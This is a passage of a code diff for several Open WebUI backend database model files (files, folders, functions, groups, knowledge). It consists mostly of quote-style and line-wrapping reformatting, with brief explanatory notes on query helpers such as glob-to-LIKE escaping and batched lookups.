id: str, data: dict, db: Optional[Session] = None - ) -> Optional[FileModel]: + def update_file_data_by_id(self, id: str, data: dict, db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: try: file = db.query(File).filter_by(id=id).first() @@ -390,12 +353,9 @@ def update_file_data_by_id( db.commit() return FileModel.model_validate(file) except Exception as e: - return None - def update_file_metadata_by_id( - self, id: str, meta: dict, db: Optional[Session] = None - ) -> Optional[FileModel]: + def update_file_metadata_by_id(self, id: str, meta: dict, db: Optional[Session] = None) -> Optional[FileModel]: with 
get_db_context(db) as db:
            try:
                file = db.query(File).filter_by(id=id).first()
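Note: the _glob_to_like_pattern helper in this file is worth pausing on, since it is what keeps user-supplied filename globs in search_files from injecting SQL LIKE wildcards. Below is a minimal, self-contained sketch with worked conversions; the function body mirrors the diff, while the standalone name and sample inputs are illustrative only.

def glob_to_like_pattern(glob: str) -> str:
    # Escape LIKE metacharacters first so literal % and _ survive,
    # then translate the glob wildcards themselves.
    pattern = glob.replace('\\', '\\\\')
    pattern = pattern.replace('%', '\\%')
    pattern = pattern.replace('_', '\\_')
    pattern = pattern.replace('*', '%')
    pattern = pattern.replace('?', '_')
    return pattern

# Worked conversions (the escape character is the backslash):
assert glob_to_like_pattern('*.txt') == '%.txt'
assert glob_to_like_pattern('file?.md') == 'file_.md'
assert glob_to_like_pattern('report_*.pdf') == 'report\\_%.pdf'  # literal _ stays escaped
# search_files then applies the result with an explicit escape character:
#   query.filter(File.filename.ilike(pattern, escape='\\'))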
backend/open_webui/models/folders.py+28 −44 modified@@ -20,7 +20,7 @@ class Folder(Base): - __tablename__ = "folder" + __tablename__ = 'folder' id = Column(Text, primary_key=True, unique=True) parent_id = Column(Text, nullable=True) user_id = Column(Text) @@ -72,14 +72,14 @@ class FolderForm(BaseModel): data: Optional[dict] = None meta: Optional[dict] = None parent_id: Optional[str] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FolderUpdateForm(BaseModel): name: Optional[str] = None data: Optional[dict] = None meta: Optional[dict] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FolderTable: @@ -94,12 +94,12 @@ def insert_new_folder( id = str(uuid.uuid4()) folder = FolderModel( **{ - "id": id, - "user_id": user_id, + 'id': id, + 'user_id': user_id, **(form_data.model_dump(exclude_unset=True) or {}), - "parent_id": parent_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'parent_id': parent_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) try: @@ -112,7 +112,7 @@ def insert_new_folder( else: return None except Exception as e: - log.exception(f"Error inserting a new folder: {e}") + log.exception(f'Error inserting a new folder: {e}') return None def get_folder_by_id_and_user_id( @@ -137,9 +137,7 @@ def get_children_folders_by_id_and_user_id( folders = [] def get_children(folder): - children = self.get_folders_by_parent_id_and_user_id( - folder.id, user_id, db=db - ) + children = self.get_folders_by_parent_id_and_user_id(folder.id, user_id, db=db) for child in children: get_children(child) folders.append(child) @@ -153,14 +151,9 @@ def get_children(folder): except Exception: return None - def get_folders_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[FolderModel]: + def get_folders_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[FolderModel]: with get_db_context(db) as db: - return [ - FolderModel.model_validate(folder) - for folder in db.query(Folder).filter_by(user_id=user_id).all() - ] + return [FolderModel.model_validate(folder) for folder in db.query(Folder).filter_by(user_id=user_id).all()] def get_folder_by_parent_id_and_user_id_and_name( self, @@ -184,7 +177,7 @@ def get_folder_by_parent_id_and_user_id_and_name( return FolderModel.model_validate(folder) except Exception as e: - log.error(f"get_folder_by_parent_id_and_user_id_and_name: {e}") + log.error(f'get_folder_by_parent_id_and_user_id_and_name: {e}') return None def get_folders_by_parent_id_and_user_id( @@ -193,9 +186,7 @@ def get_folders_by_parent_id_and_user_id( with get_db_context(db) as db: return [ FolderModel.model_validate(folder) - for folder in db.query(Folder) - .filter_by(parent_id=parent_id, user_id=user_id) - .all() + for folder in db.query(Folder).filter_by(parent_id=parent_id, user_id=user_id).all() ] def update_folder_parent_id_by_id_and_user_id( @@ -219,7 +210,7 @@ def update_folder_parent_id_by_id_and_user_id( return FolderModel.model_validate(folder) except Exception as e: - log.error(f"update_folder: {e}") + log.error(f'update_folder: {e}') return def update_folder_by_id_and_user_id( @@ -241,7 +232,7 @@ def update_folder_by_id_and_user_id( existing_folder = ( db.query(Folder) .filter_by( - name=form_data.get("name"), + name=form_data.get('name'), parent_id=folder.parent_id, user_id=user_id, ) @@ -251,25 +242,25 @@ def update_folder_by_id_and_user_id( if existing_folder and existing_folder.id != id: return None - 
folder.name = form_data.get("name", folder.name) - if "data" in form_data: + folder.name = form_data.get('name', folder.name) + if 'data' in form_data: folder.data = { **(folder.data or {}), - **form_data["data"], + **form_data['data'], } - if "meta" in form_data: + if 'meta' in form_data: folder.meta = { **(folder.meta or {}), - **form_data["meta"], + **form_data['meta'], } folder.updated_at = int(time.time()) db.commit() return FolderModel.model_validate(folder) except Exception as e: - log.error(f"update_folder: {e}") + log.error(f'update_folder: {e}') return def update_folder_is_expanded_by_id_and_user_id( @@ -289,12 +280,10 @@ def update_folder_is_expanded_by_id_and_user_id( return FolderModel.model_validate(folder) except Exception as e: - log.error(f"update_folder: {e}") + log.error(f'update_folder: {e}') return - def delete_folder_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> list[str]: + def delete_folder_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> list[str]: try: folder_ids = [] with get_db_context(db) as db: @@ -306,11 +295,8 @@ def delete_folder_by_id_and_user_id( # Delete all children folders def delete_children(folder): - folder_children = self.get_folders_by_parent_id_and_user_id( - folder.id, user_id, db=db - ) + folder_children = self.get_folders_by_parent_id_and_user_id(folder.id, user_id, db=db) for folder_child in folder_children: - delete_children(folder_child) folder_ids.append(folder_child.id) @@ -323,12 +309,12 @@ def delete_children(folder): db.commit() return folder_ids except Exception as e: - log.error(f"delete_folder: {e}") + log.error(f'delete_folder: {e}') return [] def normalize_folder_name(self, name: str) -> str: # Replace _ and space with a single space, lower case, collapse multiple spaces - name = re.sub(r"[\s_]+", " ", name) + name = re.sub(r'[\s_]+', ' ', name) return name.strip().lower() def search_folders_by_names( @@ -349,9 +335,7 @@ def search_folders_by_names( results[folder.id] = FolderModel.model_validate(folder) # get children folders - children = self.get_children_folders_by_id_and_user_id( - folder.id, user_id, db=db - ) + children = self.get_children_folders_by_id_and_user_id(folder.id, user_id, db=db) for child in children: results[child.id] = child
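Note: a quick self-contained check of the name normalisation used by search_folders_by_names; the function body matches the diff, and the sample strings are made up.

import re

def normalize_folder_name(name: str) -> str:
    # Collapse runs of whitespace and underscores into a single space,
    # then trim and lowercase for case-insensitive matching.
    name = re.sub(r'[\s_]+', ' ', name)
    return name.strip().lower()

assert normalize_folder_name('  My_Project  Notes ') == 'my project notes'
assert normalize_folder_name('A__B') == 'a b'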
backend/open_webui/models/functions.py+52 −97 modified@@ -16,7 +16,7 @@ class Function(Base): - __tablename__ = "function" + __tablename__ = 'function' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -30,13 +30,13 @@ class Function(Base): updated_at = Column(BigInteger) created_at = Column(BigInteger) - __table_args__ = (Index("is_global_idx", "is_global"),) + __table_args__ = (Index('is_global_idx', 'is_global'),) class FunctionMeta(BaseModel): description: Optional[str] = None manifest: Optional[dict] = {} - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FunctionModel(BaseModel): @@ -113,10 +113,10 @@ def insert_new_function( function = FunctionModel( **{ **form_data.model_dump(), - "user_id": user_id, - "type": type, - "updated_at": int(time.time()), - "created_at": int(time.time()), + 'user_id': user_id, + 'type': type, + 'updated_at': int(time.time()), + 'created_at': int(time.time()), } ) @@ -131,7 +131,7 @@ def insert_new_function( else: return None except Exception as e: - log.exception(f"Error creating a new function: {e}") + log.exception(f'Error creating a new function: {e}') return None def sync_functions( @@ -156,16 +156,16 @@ def sync_functions( db.query(Function).filter_by(id=func.id).update( { **func.model_dump(), - "user_id": user_id, - "updated_at": int(time.time()), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) else: new_func = Function( **{ **func.model_dump(), - "user_id": user_id, - "updated_at": int(time.time()), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) db.add(new_func) @@ -177,27 +177,20 @@ def sync_functions( db.commit() - return [ - FunctionModel.model_validate(func) - for func in db.query(Function).all() - ] + return [FunctionModel.model_validate(func) for func in db.query(Function).all()] except Exception as e: - log.exception(f"Error syncing functions for user {user_id}: {e}") + log.exception(f'Error syncing functions for user {user_id}: {e}') return [] - def get_function_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[FunctionModel]: + def get_function_by_id(self, id: str, db: Optional[Session] = None) -> Optional[FunctionModel]: try: with get_db_context(db) as db: function = db.get(Function, id) return FunctionModel.model_validate(function) except Exception: return None - def get_functions_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_functions_by_ids(self, ids: list[str], db: Optional[Session] = None) -> list[FunctionModel]: """ Batch fetch multiple functions by their IDs in a single query. Returns functions in the same order as the input IDs (None entries filtered out). 
@@ -225,18 +218,11 @@ def get_functions( functions = db.query(Function).all() if include_valves: - return [ - FunctionWithValvesModel.model_validate(function) - for function in functions - ] + return [FunctionWithValvesModel.model_validate(function) for function in functions] else: - return [ - FunctionModel.model_validate(function) for function in functions - ] + return [FunctionModel.model_validate(function) for function in functions] - def get_function_list( - self, db: Optional[Session] = None - ) -> list[FunctionUserResponse]: + def get_function_list(self, db: Optional[Session] = None) -> list[FunctionUserResponse]: with get_db_context(db) as db: functions = db.query(Function).order_by(Function.updated_at.desc()).all() user_ids = list(set(func.user_id for func in functions)) @@ -248,69 +234,48 @@ def get_function_list( FunctionUserResponse.model_validate( { **FunctionModel.model_validate(func).model_dump(), - "user": ( - users_dict.get(func.user_id).model_dump() - if func.user_id in users_dict - else None - ), + 'user': (users_dict.get(func.user_id).model_dump() if func.user_id in users_dict else None), } ) for func in functions ] - def get_functions_by_type( - self, type: str, active_only=False, db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_functions_by_type(self, type: str, active_only=False, db: Optional[Session] = None) -> list[FunctionModel]: with get_db_context(db) as db: if active_only: return [ FunctionModel.model_validate(function) - for function in db.query(Function) - .filter_by(type=type, is_active=True) - .all() + for function in db.query(Function).filter_by(type=type, is_active=True).all() ] else: return [ - FunctionModel.model_validate(function) - for function in db.query(Function).filter_by(type=type).all() + FunctionModel.model_validate(function) for function in db.query(Function).filter_by(type=type).all() ] - def get_global_filter_functions( - self, db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_global_filter_functions(self, db: Optional[Session] = None) -> list[FunctionModel]: with get_db_context(db) as db: return [ FunctionModel.model_validate(function) - for function in db.query(Function) - .filter_by(type="filter", is_active=True, is_global=True) - .all() + for function in db.query(Function).filter_by(type='filter', is_active=True, is_global=True).all() ] - def get_global_action_functions( - self, db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_global_action_functions(self, db: Optional[Session] = None) -> list[FunctionModel]: with get_db_context(db) as db: return [ FunctionModel.model_validate(function) - for function in db.query(Function) - .filter_by(type="action", is_active=True, is_global=True) - .all() + for function in db.query(Function).filter_by(type='action', is_active=True, is_global=True).all() ] - def get_function_valves_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[dict]: + def get_function_valves_by_id(self, id: str, db: Optional[Session] = None) -> Optional[dict]: with get_db_context(db) as db: try: function = db.get(Function, id) return function.valves if function.valves else {} except Exception as e: - log.exception(f"Error getting function valves by id {id}: {e}") + log.exception(f'Error getting function valves by id {id}: {e}') return None - def get_function_valves_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> dict[str, dict]: + def get_function_valves_by_ids(self, ids: list[str], db: Optional[Session] = None) -> dict[str, dict]: """ Batch 
fetch valves for multiple functions in a single query. Returns a dict mapping function_id -> valves dict. @@ -320,14 +285,10 @@ def get_function_valves_by_ids( return {} try: with get_db_context(db) as db: - functions = ( - db.query(Function.id, Function.valves) - .filter(Function.id.in_(ids)) - .all() - ) + functions = db.query(Function.id, Function.valves).filter(Function.id.in_(ids)).all() return {f.id: (f.valves if f.valves else {}) for f in functions} except Exception as e: - log.exception(f"Error batch-fetching function valves: {e}") + log.exception(f'Error batch-fetching function valves: {e}') return {} def update_function_valves_by_id( @@ -364,25 +325,23 @@ def update_function_metadata_by_id( else: return None except Exception as e: - log.exception(f"Error updating function metadata by id {id}: {e}") + log.exception(f'Error updating function metadata by id {id}: {e}') return None - def get_user_valves_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[dict]: + def get_user_valves_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[dict]: try: user = Users.get_user_by_id(user_id, db=db) user_settings = user.settings.model_dump() if user.settings else {} # Check if user has "functions" and "valves" settings - if "functions" not in user_settings: - user_settings["functions"] = {} - if "valves" not in user_settings["functions"]: - user_settings["functions"]["valves"] = {} + if 'functions' not in user_settings: + user_settings['functions'] = {} + if 'valves' not in user_settings['functions']: + user_settings['functions']['valves'] = {} - return user_settings["functions"]["valves"].get(id, {}) + return user_settings['functions']['valves'].get(id, {}) except Exception as e: - log.exception(f"Error getting user values by id {id} and user id {user_id}") + log.exception(f'Error getting user values by id {id} and user id {user_id}') return None def update_user_valves_by_id_and_user_id( @@ -393,32 +352,28 @@ def update_user_valves_by_id_and_user_id( user_settings = user.settings.model_dump() if user.settings else {} # Check if user has "functions" and "valves" settings - if "functions" not in user_settings: - user_settings["functions"] = {} - if "valves" not in user_settings["functions"]: - user_settings["functions"]["valves"] = {} + if 'functions' not in user_settings: + user_settings['functions'] = {} + if 'valves' not in user_settings['functions']: + user_settings['functions']['valves'] = {} - user_settings["functions"]["valves"][id] = valves + user_settings['functions']['valves'][id] = valves # Update the user settings in the database - Users.update_user_by_id(user_id, {"settings": user_settings}, db=db) + Users.update_user_by_id(user_id, {'settings': user_settings}, db=db) - return user_settings["functions"]["valves"][id] + return user_settings['functions']['valves'][id] except Exception as e: - log.exception( - f"Error updating user valves by id {id} and user_id {user_id}: {e}" - ) + log.exception(f'Error updating user valves by id {id} and user_id {user_id}: {e}') return None - def update_function_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[FunctionModel]: + def update_function_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[FunctionModel]: with get_db_context(db) as db: try: db.query(Function).filter_by(id=id).update( { **updated, - "updated_at": int(time.time()), + 'updated_at': int(time.time()), } ) db.commit() @@ -432,8 +387,8 @@ def 
deactivate_all_functions(self, db: Optional[Session] = None) -> Optional[boo try: db.query(Function).update( { - "is_active": False, - "updated_at": int(time.time()), + 'is_active': False, + 'updated_at': int(time.time()), } ) db.commit()
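Note: get_function_valves_by_ids above replaces per-id lookups with a single IN (...) query. A minimal sketch of that batch pattern follows; it assumes the Function model and a live SQLAlchemy Session from this module, and the wrapper name is illustrative.

from sqlalchemy.orm import Session

def fetch_valves_batch(db: Session, ids: list[str]) -> dict[str, dict]:
    if not ids:
        return {}  # never emit an empty IN () clause
    rows = (
        db.query(Function.id, Function.valves)  # fetch only the two needed columns
        .filter(Function.id.in_(ids))           # one round-trip for all ids
        .all()
    )
    # ids with no matching row are simply absent; NULL valves normalise to {}
    return {row.id: (row.valves or {}) for row in rows}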
backend/open_webui/models/groups.py+66 −123 modified@@ -34,7 +34,7 @@ class Group(Base): - __tablename__ = "group" + __tablename__ = 'group' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text) @@ -70,12 +70,12 @@ class GroupModel(BaseModel): class GroupMember(Base): - __tablename__ = "group_member" + __tablename__ = 'group_member' id = Column(Text, unique=True, primary_key=True) group_id = Column( Text, - ForeignKey("group.id", ondelete="CASCADE"), + ForeignKey('group.id', ondelete='CASCADE'), nullable=False, ) user_id = Column(Text, nullable=False) @@ -133,28 +133,26 @@ class GroupListResponse(BaseModel): class GroupTable: def _ensure_default_share_config(self, group_data: dict) -> dict: """Ensure the group data dict has a default share config if not already set.""" - if "data" not in group_data or group_data["data"] is None: - group_data["data"] = {} - if "config" not in group_data["data"]: - group_data["data"]["config"] = {} - if "share" not in group_data["data"]["config"]: - group_data["data"]["config"]["share"] = DEFAULT_GROUP_SHARE_PERMISSION + if 'data' not in group_data or group_data['data'] is None: + group_data['data'] = {} + if 'config' not in group_data['data']: + group_data['data']['config'] = {} + if 'share' not in group_data['data']['config']: + group_data['data']['config']['share'] = DEFAULT_GROUP_SHARE_PERMISSION return group_data def insert_new_group( self, user_id: str, form_data: GroupForm, db: Optional[Session] = None ) -> Optional[GroupModel]: with get_db_context(db) as db: - group_data = self._ensure_default_share_config( - form_data.model_dump(exclude_none=True) - ) + group_data = self._ensure_default_share_config(form_data.model_dump(exclude_none=True)) group = GroupModel( **{ **group_data, - "id": str(uuid.uuid4()), - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -183,57 +181,47 @@ def get_groups(self, filter, db: Optional[Session] = None) -> list[GroupResponse .where(GroupMember.group_id == Group.id) .correlate(Group) .scalar_subquery() - .label("member_count") + .label('member_count') ) query = db.query(Group, member_count) if filter: - if "query" in filter: - query = query.filter(Group.name.ilike(f"%{filter['query']}%")) + if 'query' in filter: + query = query.filter(Group.name.ilike(f'%{filter["query"]}%')) # When share filter is present, member check is handled in the share logic - if "share" in filter: - share_value = filter["share"] - member_id = filter.get("member_id") - json_share = Group.data["config"]["share"] + if 'share' in filter: + share_value = filter['share'] + member_id = filter.get('member_id') + json_share = Group.data['config']['share'] json_share_str = json_share.as_string() json_share_lower = func.lower(json_share_str) if share_value: anyone_can_share = or_( Group.data.is_(None), json_share_str.is_(None), - json_share_lower == "true", - json_share_lower == "1", # Handle SQLite boolean true + json_share_lower == 'true', + json_share_lower == '1', # Handle SQLite boolean true ) if member_id: - member_groups_select = select(GroupMember.group_id).where( - GroupMember.user_id == member_id - ) + member_groups_select = select(GroupMember.group_id).where(GroupMember.user_id == member_id) members_only_and_is_member = and_( - json_share_lower == "members", + json_share_lower == 'members', Group.id.in_(member_groups_select), ) - query = query.filter( - 
or_(anyone_can_share, members_only_and_is_member) - ) + query = query.filter(or_(anyone_can_share, members_only_and_is_member)) else: query = query.filter(anyone_can_share) else: - query = query.filter( - and_(Group.data.isnot(None), json_share_lower == "false") - ) + query = query.filter(and_(Group.data.isnot(None), json_share_lower == 'false')) else: # Only apply member_id filter when share filter is NOT present - if "member_id" in filter: + if 'member_id' in filter: query = query.filter( - Group.id.in_( - select(GroupMember.group_id).where( - GroupMember.user_id == filter["member_id"] - ) - ) + Group.id.in_(select(GroupMember.group_id).where(GroupMember.user_id == filter['member_id'])) ) results = query.order_by(Group.updated_at.desc()).all() @@ -242,7 +230,7 @@ def get_groups(self, filter, db: Optional[Session] = None) -> list[GroupResponse GroupResponse.model_validate( { **GroupModel.model_validate(group).model_dump(), - "member_count": count or 0, + 'member_count': count or 0, } ) for group, count in results @@ -259,22 +247,16 @@ def search_groups( query = db.query(Group) if filter: - if "query" in filter: - query = query.filter(Group.name.ilike(f"%{filter['query']}%")) - if "member_id" in filter: + if 'query' in filter: + query = query.filter(Group.name.ilike(f'%{filter["query"]}%')) + if 'member_id' in filter: query = query.filter( - Group.id.in_( - select(GroupMember.group_id).where( - GroupMember.user_id == filter["member_id"] - ) - ) + Group.id.in_(select(GroupMember.group_id).where(GroupMember.user_id == filter['member_id'])) ) - if "share" in filter: - share_value = filter["share"] - query = query.filter( - Group.data.op("->>")("share") == str(share_value) - ) + if 'share' in filter: + share_value = filter['share'] + query = query.filter(Group.data.op('->>')('share') == str(share_value)) total = query.count() @@ -283,32 +265,24 @@ def search_groups( .where(GroupMember.group_id == Group.id) .correlate(Group) .scalar_subquery() - .label("member_count") - ) - results = ( - query.add_columns(member_count) - .order_by(Group.updated_at.desc()) - .offset(skip) - .limit(limit) - .all() + .label('member_count') ) + results = query.add_columns(member_count).order_by(Group.updated_at.desc()).offset(skip).limit(limit).all() return { - "items": [ + 'items': [ GroupResponse.model_validate( { **GroupModel.model_validate(group).model_dump(), - "member_count": count or 0, + 'member_count': count or 0, } ) for group, count in results ], - "total": total, + 'total': total, } - def get_groups_by_member_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[GroupModel]: + def get_groups_by_member_id(self, user_id: str, db: Optional[Session] = None) -> list[GroupModel]: with get_db_context(db) as db: return [ GroupModel.model_validate(group) @@ -340,51 +314,37 @@ def get_groups_by_member_ids( return user_groups - def get_group_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[GroupModel]: + def get_group_by_id(self, id: str, db: Optional[Session] = None) -> Optional[GroupModel]: try: with get_db_context(db) as db: group = db.query(Group).filter_by(id=id).first() return GroupModel.model_validate(group) if group else None except Exception: return None - def get_group_user_ids_by_id( - self, id: str, db: Optional[Session] = None - ) -> list[str]: + def get_group_user_ids_by_id(self, id: str, db: Optional[Session] = None) -> list[str]: with get_db_context(db) as db: - members = ( - db.query(GroupMember.user_id).filter(GroupMember.group_id == id).all() - ) + members = 
db.query(GroupMember.user_id).filter(GroupMember.group_id == id).all() if not members: return [] return [m[0] for m in members] - def get_group_user_ids_by_ids( - self, group_ids: list[str], db: Optional[Session] = None - ) -> dict[str, list[str]]: + def get_group_user_ids_by_ids(self, group_ids: list[str], db: Optional[Session] = None) -> dict[str, list[str]]: with get_db_context(db) as db: members = ( - db.query(GroupMember.group_id, GroupMember.user_id) - .filter(GroupMember.group_id.in_(group_ids)) - .all() + db.query(GroupMember.group_id, GroupMember.user_id).filter(GroupMember.group_id.in_(group_ids)).all() ) - group_user_ids: dict[str, list[str]] = { - group_id: [] for group_id in group_ids - } + group_user_ids: dict[str, list[str]] = {group_id: [] for group_id in group_ids} for group_id, user_id in members: group_user_ids[group_id].append(user_id) return group_user_ids - def set_group_user_ids_by_id( - self, group_id: str, user_ids: list[str], db: Optional[Session] = None - ) -> None: + def set_group_user_ids_by_id(self, group_id: str, user_ids: list[str], db: Optional[Session] = None) -> None: with get_db_context(db) as db: # Delete existing members db.query(GroupMember).filter(GroupMember.group_id == group_id).delete() @@ -405,20 +365,12 @@ def set_group_user_ids_by_id( db.add_all(new_members) db.commit() - def get_group_member_count_by_id( - self, id: str, db: Optional[Session] = None - ) -> int: + def get_group_member_count_by_id(self, id: str, db: Optional[Session] = None) -> int: with get_db_context(db) as db: - count = ( - db.query(func.count(GroupMember.user_id)) - .filter(GroupMember.group_id == id) - .scalar() - ) + count = db.query(func.count(GroupMember.user_id)).filter(GroupMember.group_id == id).scalar() return count if count else 0 - def get_group_member_counts_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> dict[str, int]: + def get_group_member_counts_by_ids(self, ids: list[str], db: Optional[Session] = None) -> dict[str, int]: if not ids: return {} with get_db_context(db) as db: @@ -442,7 +394,7 @@ def update_group_by_id( db.query(Group).filter_by(id=id).update( { **form_data.model_dump(exclude_none=True), - "updated_at": int(time.time()), + 'updated_at': int(time.time()), } ) db.commit() @@ -470,9 +422,7 @@ def delete_all_groups(self, db: Optional[Session] = None) -> bool: except Exception: return False - def remove_user_from_all_groups( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def remove_user_from_all_groups(self, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: try: # Find all groups the user belongs to @@ -489,9 +439,7 @@ def remove_user_from_all_groups( GroupMember.group_id == group.id, GroupMember.user_id == user_id ).delete() - db.query(Group).filter_by(id=group.id).update( - {"updated_at": int(time.time())} - ) + db.query(Group).filter_by(id=group.id).update({'updated_at': int(time.time())}) db.commit() return True @@ -503,7 +451,6 @@ def remove_user_from_all_groups( def create_groups_by_group_names( self, user_id: str, group_names: list[str], db: Optional[Session] = None ) -> list[GroupModel]: - # check for existing groups existing_groups = self.get_all_groups(db=db) existing_group_names = {group.name for group in existing_groups} @@ -517,10 +464,10 @@ def create_groups_by_group_names( id=str(uuid.uuid4()), user_id=user_id, name=group_name, - description="", + description='', data={ - "config": { - "share": DEFAULT_GROUP_SHARE_PERMISSION, + 'config': { + 'share': 
DEFAULT_GROUP_SHARE_PERMISSION, } }, created_at=int(time.time()), @@ -537,17 +484,13 @@ def create_groups_by_group_names( continue return new_groups - def sync_groups_by_group_names( - self, user_id: str, group_names: list[str], db: Optional[Session] = None - ) -> bool: + def sync_groups_by_group_names(self, user_id: str, group_names: list[str], db: Optional[Session] = None) -> bool: with get_db_context(db) as db: try: now = int(time.time()) # 1. Groups that SHOULD contain the user - target_groups = ( - db.query(Group).filter(Group.name.in_(group_names)).all() - ) + target_groups = db.query(Group).filter(Group.name.in_(group_names)).all() target_group_ids = {g.id for g in target_groups} # 2. Groups the user is CURRENTLY in @@ -571,7 +514,7 @@ def sync_groups_by_group_names( ).delete(synchronize_session=False) db.query(Group).filter(Group.id.in_(groups_to_remove)).update( - {"updated_at": now}, synchronize_session=False + {'updated_at': now}, synchronize_session=False ) # 5. Bulk insert missing memberships @@ -588,7 +531,7 @@ def sync_groups_by_group_names( if groups_to_add: db.query(Group).filter(Group.id.in_(groups_to_add)).update( - {"updated_at": now}, synchronize_session=False + {'updated_at': now}, synchronize_session=False ) db.commit() @@ -656,9 +599,9 @@ def remove_users_from_group( return GroupModel.model_validate(group) # Remove users from group_member in batch - db.query(GroupMember).filter( - GroupMember.group_id == id, GroupMember.user_id.in_(user_ids) - ).delete(synchronize_session=False) + db.query(GroupMember).filter(GroupMember.group_id == id, GroupMember.user_id.in_(user_ids)).delete( + synchronize_session=False + ) # Update group timestamp group.updated_at = int(time.time())
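Note: the member_count expression the diff attaches to group listings is a correlated scalar subquery, so per-group counts come back in the same SELECT as the groups themselves. A minimal sketch, assuming the Group and GroupMember models from this module:

from sqlalchemy import func, select

member_count = (
    select(func.count(GroupMember.user_id))
    .where(GroupMember.group_id == Group.id)  # correlated to the outer Group row
    .correlate(Group)
    .scalar_subquery()
    .label('member_count')
)

# db.query(Group, member_count).order_by(Group.updated_at.desc()).all()
# yields (Group, count) pairs, avoiding a COUNT round-trip per group.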
backend/open_webui/models/knowledge.py+90 −169 modified@@ -38,7 +38,7 @@ class Knowledge(Base): - __tablename__ = "knowledge" + __tablename__ = 'knowledge' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text) @@ -70,24 +70,18 @@ class KnowledgeModel(BaseModel): class KnowledgeFile(Base): - __tablename__ = "knowledge_file" + __tablename__ = 'knowledge_file' id = Column(Text, unique=True, primary_key=True) - knowledge_id = Column( - Text, ForeignKey("knowledge.id", ondelete="CASCADE"), nullable=False - ) - file_id = Column(Text, ForeignKey("file.id", ondelete="CASCADE"), nullable=False) + knowledge_id = Column(Text, ForeignKey('knowledge.id', ondelete='CASCADE'), nullable=False) + file_id = Column(Text, ForeignKey('file.id', ondelete='CASCADE'), nullable=False) user_id = Column(Text, nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) - __table_args__ = ( - UniqueConstraint( - "knowledge_id", "file_id", name="uq_knowledge_file_knowledge_file" - ), - ) + __table_args__ = (UniqueConstraint('knowledge_id', 'file_id', name='uq_knowledge_file_knowledge_file'),) class KnowledgeFileModel(BaseModel): @@ -138,24 +132,18 @@ class KnowledgeFileListResponse(BaseModel): class KnowledgeTable: - def _get_access_grants( - self, knowledge_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("knowledge", knowledge_id, db=db) + def _get_access_grants(self, knowledge_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('knowledge', knowledge_id, db=db) def _to_knowledge_model( self, knowledge: Knowledge, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> KnowledgeModel: - knowledge_data = KnowledgeModel.model_validate(knowledge).model_dump( - exclude={"access_grants"} - ) - knowledge_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(knowledge_data["id"], db=db) + knowledge_data = KnowledgeModel.model_validate(knowledge).model_dump(exclude={'access_grants'}) + knowledge_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(knowledge_data['id'], db=db) ) return KnowledgeModel.model_validate(knowledge_data) @@ -165,23 +153,21 @@ def insert_new_knowledge( with get_db_context(db) as db: knowledge = KnowledgeModel( **{ - **form_data.model_dump(exclude={"access_grants"}), - "id": str(uuid.uuid4()), - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), - "access_grants": [], + **form_data.model_dump(exclude={'access_grants'}), + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), + 'access_grants': [], } ) try: - result = Knowledge(**knowledge.model_dump(exclude={"access_grants"})) + result = Knowledge(**knowledge.model_dump(exclude={'access_grants'})) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "knowledge", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('knowledge', result.id, form_data.access_grants, db=db) if result: return self._to_knowledge_model(result, db=db) else: @@ -193,17 +179,13 @@ def get_knowledge_bases( self, skip: int = 0, limit: int = 30, db: Optional[Session] = None ) -> list[KnowledgeUserModel]: with get_db_context(db) as db: - all_knowledge = ( - 
